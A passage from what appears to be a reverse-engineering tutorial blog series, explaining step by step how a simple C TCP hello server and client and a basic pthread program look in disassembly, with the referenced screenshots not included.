First, the server variables are created and initialized.

server = socket(…) — assembly

Next, the socket file descriptor ‘server’ is created by calling the _socket system function with the protocol, type, and domain settings passed through the edxesi, and edi registers respectively.

setockopt(…) — assembly

Then, setsockopt is called to set the socket options on the ‘server’ socket file descriptor.

address initialization — assembly

Next, the server’s address is initialized through adress.sin_familyaddress.sin_addr.s_addr, and address.sin_port.

bind(…) — assembly

Upon address and socket configuration, the server is bound to the network address using the _bind system call.

listen(…) — assembly

Once bound, the server listens on the socket by passing in the ‘server’ socket file descriptor and a max queue length of 3.

sock = accept(…) — assembly

Once a connection is made, the server accepts the socket connection into the sock variable.

value = read(…) — assembly

The server then reads the transmitted message into the value variable using the _read system call.

send(…) — assembly

Finally, the server sends the serverhello message through the variable (which represents serverhello in the code).

Client

First, let’s look at the code: 

Client — code

first, the socket file descriptor ‘sock’ is created with the AF_INET domain, SOCK_STREAM type, and protocol code 0. Next, memset is used to fill the memory area of server_addr with ‘0’s before address information is set using server_addr.sin_family and server_addr.sin_port. Next, the address information is converted from text to binary format using inet_pton before the client connects to the server. Upon connection, the client sends it’s helloclient string and then reads the server’s response into the value variable. Finally, the value variable is printed out and the function returns.

Now, let’s break down the assembly:

Client variable initialization — assembly

First, the client’s local variables are initialized.

sock = socket(…) — assembly

The ‘sock’ socket file descriptor is created by calling the _socket system function and passing in the protocol, type, and domain information through the edxesi, and edi registers respectively.

memset(…) — assembly

Next, the server_address variable (represented as ‘s’ in assembly) is filled with ‘0’s (0x30) using the _memset system call.

Client — address configuration — assembly

Then, the address information for the server is configured.

inet_pton(…) — assembly

Next, the address is translated from text to binary format using the _inet_pton system call. Please note that since no address was explicitly defined in the code, localhost (127.0.0.1) is assumed.

connect(…) — assembly

The client connects to the server using the _connect system call.

send(…) — assembly

Upon connecting, the client sends the helloClient string to the server.

value = read(…)

Finally, the client reads the server’s reply into the value variable using the _read system call.

Threading

Finally, we’ll cover the basics of threading in C.

First, let’s look at the code:

Threading — Code

As you can see, the program first prints “This is before the thread”, then creates a new thread that points to the *mythread function using the pthread_create function. Upon completion of the *mythread function (after sleeping for 1 second and printing “Hello from mythread”), the new thread is joined back the main thread using the pthread_join function and “This is after the thread” is printed.

Now, let’s break down the assembly:

printf “This is before the thread” — assembly

First, the program prints “This is before the thread”.

Creating a new thread — assembly

Next, a new thread is created with the _pthread_create system call. This thread points to mythread as it’s start routine.

The mythread function — assembly

As you can see, the mythread function simply sleeps for one second before printing “Hello from mythread”.

Please note: In the mythread function you will see two ‘nop’s. These were specifically placed for easier navigation during the preparation stage of this article.

joining the mythread function’s thread back to the main thread — assembly

Upon returning from the mythread function, the new thread is joined with the main thread using the _pthread_join function.

printf “This is after the thread” — assembly

Finally, “This is after the thread” is printed out and the function returns.

Closing Statements

I hope this article was able to shed some light on some more advanced programming concepts and their underlying assembly code. Now that we’ve covered all the major programming concepts, the next few articles in the BOLO: Reverse Engineering series will be dedicated to different types of attacks and vulnerable code so that you may be able to more quickly identify vulnerabilities and attacks within closed source programs through static analysis.